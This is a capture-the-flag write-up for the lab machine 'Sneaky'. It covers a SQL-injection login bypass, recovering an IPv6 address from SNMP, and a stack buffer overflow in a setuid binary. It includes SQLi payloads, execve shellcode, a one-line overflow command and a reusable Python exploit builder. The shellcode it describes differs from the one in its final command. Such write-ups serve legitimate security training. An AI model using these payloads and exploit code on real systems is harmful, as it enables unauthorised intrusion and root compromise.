# Sneaky

## Sneaky - 10.10.10.20

### Target Enumeration:

IP: 10.10.10.20

User: 9fe14f76222db23a770f20136751bdab

Root: See screenshot

### Ports / Services / Software Versions Running

80/tcp open  http Apache httpd 2.4.7 ((Ubuntu))

161/udp open  snmp SNMPv1 server; net-snmp SNMPv3 server (public)

### Vulnerability Exploited:

SQLi authentication bypass

User's SSH private key stored on the web server.

### Privilege Escalation:

/usr/local/bin/chal is vulnerable to a buffer overflow

### Exploiting the host:

Nmap

![](https://lh6.googleusercontent.com/i8qPkOI8tRyXiCH8SEBrcmGlEAm9jGchK1S8PKRKDkRaHBSyHkvhKcEyAz69C4odFsLY_VUb6v74j75t1KQ9aRlq4UhyTvlGvqNQmuC_VB2kdyibOL3kqAty9yGKocHnP9BXIvl1)

Dirb:

<div align="left"><img src="https://lh4.googleusercontent.com/AJqex9vaoOyFd-_4nbKW7MiYhkSi-KC0VWyqYPfjSaISAfemLuXLIvn_he1Tm6JcA2n4AEiAgRM3wanowvxSsGQB3cVseXRu5KphY2bwQ8QWKWSm18u_C0x9BOHhouCDaAsEaGHc" alt=""></div>

/dev is a login page

<div align="left"><img src="https://lh4.googleusercontent.com/HFw7YSRkTm3CipYmmWSkD5uLLO2H6wwDspY3PbTcCJvy7mUqIJKe5SYfDQPAbn8VzB6_CZyzn-HLoxDXSXVThRawvX2lWheAVZ_cZPgHO-cD5L5-zWg0v4dKCzdTN3DxFrrh5Bt8" alt=""></div>

Intercept the login request and fuzz the parameters for SQL injection with Burp Intruder:

![](https://lh3.googleusercontent.com/_sMikqLi8oCm7x1XRoTLFEFU52b0yHAA8mBUznRZ2YwNE6EE2h3UZAvtyDyzNQo_JwTPHGC7YdkNhDeKjrccKPaFnR_tqDU3_rpv0m1C1W5HngGJ9w3GS24haE28lYXtmvvinYor)

You can bypass the login with an SQLi payload:

<div align="left"><img src="https://lh3.googleusercontent.com/fgfdqlSaNwWyGjEWK_TvWVywTlh0v6qv5bexDxpxnRxhLLYy7Tb_X37EK8qQqtHq8j3QCec6abSrKn3zQ5SPg8oto-zM8_pjuKIHpibsWtS5IsRNN_Ka0vHtzIHe78r2ER_G25JH" alt=""></div>
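To show the class of bug behind the bypass, here is an added example that is not part of the original writeup: a constructed stand-in for the /dev login backend (table and column names, the plaintext password and the use of sqlite3 are all assumptions; the real backend is not shown on the page), with the string-concatenating query beside its parameterised form and a few representative payloads run against both.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the login backend: one user, plaintext password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db


def login_vulnerable(db, name, password):
    """Concatenates user input into the SQL text, so a quote in either field
    rewrites the WHERE clause."""
    query = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
             % (name, password))
    return db.execute(query).fetchone() is not None


def login_fixed(db, name, password):
    """Parameterised: values travel separately from the SQL text, so a quote
    in the input is just a character in a string."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(query, (name, password)).fetchone() is not None


def demo():
    """Run representative payloads against both implementations.
    Returns (vulnerable_result, fixed_result) per attempt."""
    db = make_db()
    attempts = [
        ("admin' -- ", "wrong"),     # comment out the password check
        ("' OR 1=1 -- ", "wrong"),   # always-true predicate, rest commented out
        ("nobody", "' OR '1'='1"),   # always-true tail appended via the password field
    ]
    return [(login_vulnerable(db, n, p), login_fixed(db, n, p)) for n, p in attempts]


if __name__ == "__main__":
    for (vuln, fixed), (n, p) in zip(demo(), ["name", "name", "password"]):
        print("payload in %-8s vulnerable=%s fixed=%s" % (n, vuln, fixed))
```

Note the operator precedence: `' OR '1'='1` placed in the username field would give `name = '' OR ('1'='1' AND password = '...')`, which is still false, so it goes in the password field or is paired with a comment sequence. The trailing space after `--` matters on MySQL, which only treats `-- ` followed by whitespace as a comment.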

Request the path in the browser and download the key:

<div align="left"><img src="https://lh5.googleusercontent.com/713Ce8xaK_V__xrlpivTO_Tuj-z0_YjsMbuwmDK2FM4WicqNTva2dlKnzl0l6T1iUZu0fRBvD35jYwFkCKFY9Mi6yUUlbV5cuIcUhTRzY5jNHEKVtFWpku0zc4pJnP3kkEiRBiSv" alt=""></div>

Key contents

<div align="left"><img src="https://lh4.googleusercontent.com/VG_612Ol081hzE0ANMs4wa8DqBQ63d8f8lhpGLJ1qbWRb_OWS7tPO1nkDts_sHUyyWbgMoMNl-hTosruuhlKN5ZsAMd_V2y1zrGElZdYYeJHFHa0CBDVzOwxf-1VTOnHDZVVH2BL" alt=""></div>

There is no SSH port open on IPv4, so we need to find the host's IPv6 address and check whether SSH listens there.

First check our own IPv6 address for reference, then pull the target's addresses from SNMP.

snmpwalk with the `public` community string gives lots of information:

![](https://lh4.googleusercontent.com/nCKdkk9-zNmw01y4dm-gAyQZhPn1O1phhpvTexZ4jpfDK7rrUTE-yCkgjsqAZ6p-wM-ReU3QdBbNfvnM6ZM6vBlj29ll8LlsH1gIDaDKjStdluqgdqr_nqPlqe8dhJDPp8wnz2Tn)

Find the IPv6 info

![](https://lh4.googleusercontent.com/sXfNg4BeIxnm8soaP1z1MZg_pTmWwJBvTRQ6zyfYWAYYDKGUW9KEAa3MqPakRJdbOO4rLFzuifwJrQ5t9nvCkA6dNhbENPIXsNHzqBt8Eyd5FukG9ZQXF9yDmpqfR14BGYA8v8hB)

Convert the address from decimal to hex. SNMP encodes it as the row index of the ipAddressTable (IP-MIB): after the column OID come the address type (2 = IPv6), the length (16) and the 16 octets in decimal:

iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248

The 16 octets to convert are:

254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248

which gives fe80::250:56ff:feb2:8ef8, a link-local address.

Convert to hex with python:

<div align="left"><img src="https://lh4.googleusercontent.com/XQPtbvf8roejk8vFw3D-U-0q6Vcb_3kCR90o_yvJlTp6-VLRDHww_1UxS8I1-vA-aR9sOHySK8ytx1FoblrsQ7dfNlxqojrrZWnFGv78s1yX26U-YwYQAUL7C6imgyyi3USaF9YV" alt=""></div>

Build the global address in the same format: keep the interface identifier (the last 64 bits, 250:56ff:feb2:8ef8, which is EUI-64 derived from the host's MAC and shared by every address the interface auto-configures) and put it under the lab's dead:beef:: prefix:

`dead:beef::250:56ff:feb2:8ef8`
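The conversion above, as an added example that is not the writeup's own script: decode the ipAddressIfIndex row OID printed by snmpwalk into an address, and rebuild the global address by keeping the EUI-64 interface identifier and swapping in the dead:beef::/64 prefix. It also handles IPv4 rows (address type 1) and derives the identifier from a MAC; the MAC 00:50:56:b2:8e:f8 is an assumption implied by the interface identifier, not something shown on the page.

```python
import ipaddress

# ipAddressIfIndex column of the IP-MIB ipAddressTable. The row index encodes
# InetAddressType (1 = ipv4, 2 = ipv6), the address length, then the octets.
IP_ADDRESS_IF_INDEX = "1.3.6.1.2.1.4.34.1.3"


def decode_ip_address_oid(oid):
    """Turn an ipAddressIfIndex row OID (as printed by snmpwalk) into an address."""
    if oid.startswith("iso."):
        oid = "1." + oid[len("iso."):]
    if not oid.startswith(IP_ADDRESS_IF_INDEX + "."):
        raise ValueError("not an ipAddressIfIndex row: %s" % oid)
    fields = [int(x) for x in oid[len(IP_ADDRESS_IF_INDEX) + 1:].split(".")]
    addr_type, length, octets = fields[0], fields[1], fields[2:]
    if len(octets) != length:
        raise ValueError("length %d does not match %d octets" % (length, len(octets)))
    if addr_type == 1 and length == 4:
        return ipaddress.IPv4Address(bytes(octets))
    if addr_type == 2 and length == 16:
        return ipaddress.IPv6Address(bytes(octets))
    raise ValueError("unsupported address type %d / length %d" % (addr_type, length))


def interface_id(addr):
    """Low 64 bits of an IPv6 address. For SLAAC addresses this is the EUI-64
    identifier derived from the MAC, identical in the link-local and global address."""
    return int(addr) & ((1 << 64) - 1)


def rebase(addr, prefix):
    """Keep addr's interface identifier and place it under another /64 prefix."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    if net.prefixlen != 64:
        raise ValueError("need a /64 prefix")
    return ipaddress.IPv6Address(int(net.network_address) | interface_id(addr))


def eui64_from_mac(mac):
    """Modified EUI-64 (RFC 4291): flip the U/L bit of the first octet and
    insert ff:fe between the two halves of the 48-bit MAC."""
    b = bytearray(int(x, 16) for x in mac.split(":"))
    if len(b) != 6:
        raise ValueError("bad MAC: %s" % mac)
    b[0] ^= 0x02
    return int.from_bytes(bytes(b[:3]) + b"\xff\xfe" + bytes(b[3:]), "big")


if __name__ == "__main__":
    # Row OID copied from the snmpwalk output above.
    row = "iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248"
    link_local = decode_ip_address_oid(row)
    print("link-local:", link_local)
    print("global    :", rebase(link_local, "dead:beef::/64"))
```

If the snmpwalk output also lists a dead:beef:: row directly, decoding it with the same function is the quicker path; the rebase step is for the case where only the link-local address is exposed.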

Log in over IPv6 with `ssh -6 -i <key> <user>@dead:beef::250:56ff:feb2:8ef8`:

![](https://lh5.googleusercontent.com/V39NTS1tgMyOMiEYJhG3cma8lKBYoDGhIRYd-a0brXy36b2oZ3LN7hpUO7D1IgkgidFVN_Ax_KgKDnxGLznKNr83KzpB2IjyeAkBRTxgTUy9kpwFT6PLe13HqPOn_hg9QIWrzizl)

Search for privilege escalation vectors; /usr/local/bin/chal stands out:

![](https://lh4.googleusercontent.com/CtzkIEBmtSiRxQV9lqHnSO0lsyrcIyh8wEuifE4DvIcG575rjof9wq8BRK-sbkWrfyjtswg4RDVPWsXLb4qLU5V7-E2ocaHDWnAxEh2nOP63xhEo9CQ18ilcatJJrwAmO1Ao_iMw)

Running the binary with a long argument crashes it, which suggests a buffer overflow:

<div align="left"><img src="https://lh4.googleusercontent.com/lAw3ZnKCYcqMT7q3tdnfDTWxUlLYK_hMi3EOZXURdNZKynhGvja5uKhRD46_UxWpxonBEUNx-wWWt4j_qBS6MHL8XO5I3ZbhLs2g3xA5Tz0Av4hIkmneTlTZnPWP_77BrJARebh_" alt=""></div>

Check that you can overwrite the saved return address (EIP):

![](https://lh4.googleusercontent.com/0aFs6eDsC4wKWxrzSA_ih6Oj9joM_zktkGO4sF12o9h0TwWX5pVLQTDR7pv_kkJ0Sm43SOfFvveKjBRRWTaKL_-3Vj-eYSYAIfXPSLa1pexZHMvpV8e8oAYgPstlQuOq7-B1c2iN)

Generate a cyclic pattern to locate the offset:

![](https://lh3.googleusercontent.com/IR4QPZYwpLc_AyAqaGzDFb-0Kzj2kdHtPaS-iCPGw6Nni09zGBaAWHe0-R9h5RHgdb5-c1gciuIJRbsPTprCOgfO9Gn8aVinRJhsnRESON8ysdFb6CPEGmXbCJLjDzopEZ5KAg2x)

Feed the pattern to the program as its argument:

<div align="left"><img src="https://lh4.googleusercontent.com/0O-O9xkfFbBcevvDITQJFAL9LybvqGiHQ4cDYCbsHOB2MI7l-Sc1Gevxs7-iAz0HuiWyYUdKMtLIqNKVMfUjbGusprLtJY1A40yRHu-_a55anJvwwsBNBU3IBZJfs3HjtcDdg_y6" alt=""></div>

Look up the value that landed in EIP to get the offset:

![](https://lh3.googleusercontent.com/5jijNmo8LZ73XXhlMl7Nywf2-z-P1QcXHAEucQgfkJ77fPtsoIgL1FdC1bkYbIq6V1mpJEKSNc_Z1F8FzH8eOkCexBcyfXv7Q6Gn1xkmJfTqciLZF-D8dYWWnrQOIdVGMH_zfZCb)

The offset to the saved return address is 362 bytes:

![](https://lh6.googleusercontent.com/7op9KCgUaXkjaORWM8pHpP3OPH508SUZyeC1B4tr_lxx7FG5Y9GOeBUNnEuklV1NLE4SDMHXKuafKmkb1vUTQG1I7b5vqpBB8jBiqfC0XkwQyqmVvwny3NJQjOeu5mEpOe45Oe2s)

Build the overflow using a 23-byte execve("/bin//sh") shellcode:

```
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
```

You will need to try several return addresses to get this to work: the stack layout shifts with the environment (environment variables, the argument length, and gdb itself, which runs the program with extra variables set), so the address gdb reports may be off by tens of bytes outside the debugger. The NOP sled gives some tolerance for that.

Open the binary in gdb, run it with a long argument, and find where the buffer sits on the stack:

(gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA

![](https://lh3.googleusercontent.com/Erz_6cbXeqbdU6VVKDaB8RzEm5tpVQ7dVI1h5RUxXGPnjvjtPY5tgt78IRRznvp0BR3JmBlgizkN2-kPUIOA_Egd1vjmv3r0pbDgJ2QphvpUvInEg7aeloxNbpSHAgTE3ukqKOsM)

Convert the address to little-endian byte order (0xbffff4be becomes `\xbe\xf4\xff\xbf`).

Build your payload as follows (Python 2 `print`, which writes the raw bytes):

```
# 362 bytes of padding up to the saved return address, then the address
# (0xbffff4be, little-endian) pointing into the 100-byte NOP sled, then the shellcode
/usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
```
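The pattern and payload steps above, as one added example that is not the writeup's own tooling: a Metasploit-style cyclic pattern generator and offset lookup, plus a payload builder for the filler / return address / NOP sled / shellcode layout, using the 23-byte shellcode quoted earlier. The binary path and the 0xbffff4be default are taken from the page; the `run` helper and the Python 3 invocation are assumptions. The offset 362 and the EIP value used in the usage comment are for the page's binary; on another target you would plug in what gdb reports.

```python
import struct
import subprocess
import sys

# 23-byte execve("/bin//sh") shellcode from the writeup above.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")


def pattern_create(length):
    """Cyclic pattern in the Metasploit style (Aa0Aa1...Aa9Ab0...): every 4-byte
    window is unique for the first 20280 bytes, so the value that lands in EIP
    pinpoints its offset."""
    chunks = []
    for u in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for l in "abcdefghijklmnopqrstuvwxyz":
            for d in "0123456789":
                chunks.append(u + l + d)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("length exceeds the unique pattern space")


def pattern_offset(eip_value, length=5000):
    """Offset of the pattern bytes that ended up in EIP. gdb prints EIP as a
    little-endian integer, so pack it back into the order it had in memory.
    Returns -1 if the value is not from the pattern."""
    return pattern_create(length).find(struct.pack("<I", eip_value))


def build_payload(offset, ret_addr, shellcode=SHELLCODE, nop_len=100):
    """[filler up to saved EIP][ret_addr, little-endian][NOP sled][shellcode].
    ret_addr must land inside the sled, which sits just above the saved EIP on
    the stack, so the sled gives roughly nop_len bytes of slack for the guess."""
    payload = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode
    if b"\x00" in payload:
        raise ValueError("NUL byte would truncate the argv string")
    return payload


def run(binary, payload):
    """Pass the payload as argv[1]. It is handed over as bytes, not str, so the
    high bytes reach the target untouched instead of being UTF-8 encoded."""
    return subprocess.call([binary, payload])


if __name__ == "__main__":
    # python3 exploit.py 0xbffff4be   (retry with nearby addresses if it segfaults)
    ret = int(sys.argv[1], 16) if len(sys.argv) > 1 else 0xbffff4be
    sys.exit(run("/usr/local/bin/chal", build_payload(362, ret)))
```

Passing the payload as bytes matters: a str containing `\xff` would be UTF-8 encoded into two bytes on the way to execve, silently shifting the return address.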

![](https://lh4.googleusercontent.com/-f7K2wlXknEa5ePcu4milvEZ0-vFzNTsloWhNJInqJgcevTHIBw6D5E00WKv-oa2wT0JAaXqpSZP9DKipqOOLn0-P4tua4CyNWHNuNb9gDJMRgt0Yyrm8327AW7AApXddfq7lBSE)

Now you have a root shell, so collect the flags:

<div align="left"><img src="https://lh3.googleusercontent.com/jyltSt5nFD9jUnVM5PaoXlGvhhqMElcfif2fuoVv2NxOKlPGy9PAcuHtpHlMgYRGHtHPotGvdb7wbZrGqstlfHpAsgArzM-ujgSEwGd3Np8vLl9yolEuCR4ytEe3w-eoo_XCe5dt" alt=""></div>

